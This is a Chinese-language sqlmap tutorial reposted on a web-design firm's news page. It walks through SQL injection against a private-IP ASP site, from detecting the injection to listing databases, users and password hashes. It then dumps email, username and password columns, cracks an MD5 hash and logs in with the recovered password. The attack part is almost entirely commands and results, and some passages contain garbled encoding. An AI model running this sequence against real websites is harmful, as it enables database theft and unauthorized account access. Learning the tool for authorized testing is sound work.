這篇文章主要介紹滲透測試工具sqlmap怎么用,文中介紹的非常詳細(xì),具有一定的參考價值,感興趣的小伙伴們一定要看完!
成都創(chuàng)新互聯(lián)公司專注于企業(yè)成都全網(wǎng)營銷推廣、網(wǎng)站重做改版、隨州網(wǎng)站定制設(shè)計、自適應(yīng)品牌網(wǎng)站建設(shè)、H5開發(fā)、商城系統(tǒng)網(wǎng)站開發(fā)、集團公司官網(wǎng)建設(shè)、外貿(mào)網(wǎng)站制作、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁設(shè)計等建站業(yè)務(wù),價格優(yōu)惠性價比高,為隨州等各大城市提供網(wǎng)站開發(fā)制作服務(wù)。C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
參數(shù):
-u:指定注入點url
注入結(jié)果展示:
(1)注入?yún)?shù)id為GET注入,注入類型有四種分別為:boolean-based blind、error-based、stacked queries、inline query。
(2)web服務(wù)器系統(tǒng)為windows 2003 or XP
(3)web應(yīng)用程序技術(shù)為:ASP.NET, Microsoft IIS 6.0
(4)數(shù)據(jù)庫類型為:SQLSERVER 2000
其中圖一有若干詢問語句,需要用戶輸入[Y/N],如果你懶得輸入或者不懂怎么輸入可以讓程序自動輸入,只需添加一個參數(shù)即可,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
一條命令即可曝出該sqlserver中所有數(shù)據(jù)庫名稱,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
參數(shù):
--dbs:dbs前面有兩條杠,請看清楚。
結(jié)果顯示該sqlserver中共包含7個可用的數(shù)據(jù)庫。
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
參數(shù):
-D:指定數(shù)據(jù)庫名稱
--tables:列出表
結(jié)果體現(xiàn)共列出了34張表。
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
參數(shù):
-D:指定數(shù)據(jù)庫名稱
-T:指定要列出字段的表
--columns:指定列出字段
結(jié)果顯示該userb表中包含了23條字段。
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
參數(shù):
-C :指定要暴的字段
--dump:將結(jié)果導(dǎo)出
如果字段內(nèi)容太多,需要花費很多時間??梢灾付▽?dǎo)出特定范圍的字段內(nèi)容,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
參數(shù):
--start:指定開始的行
--stop:指定結(jié)束的行
此條命令的含義為:導(dǎo)出數(shù)據(jù)庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數(shù)據(jù)內(nèi)容。
通過上圖結(jié)果看到其中的一個用戶信息為:
email:123456@qq.com
username: 1.asp
password: 49ba59abbe56e057
通過md5解密,得到該hash的原文密碼為:123456
拿到賬號密碼我們來測試是否可以登錄
驗證成功!
以上是“滲透測試工具sqlmap怎么用”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!
文章名稱:滲透測試工具sqlmap怎么用-創(chuàng)新互聯(lián)
文章鏈接:http://jinyejixie.com/article22/ccshjc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供商城網(wǎng)站、建站公司、電子商務(wù)、全網(wǎng)營銷推廣、品牌網(wǎng)站設(shè)計、網(wǎng)站排名
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)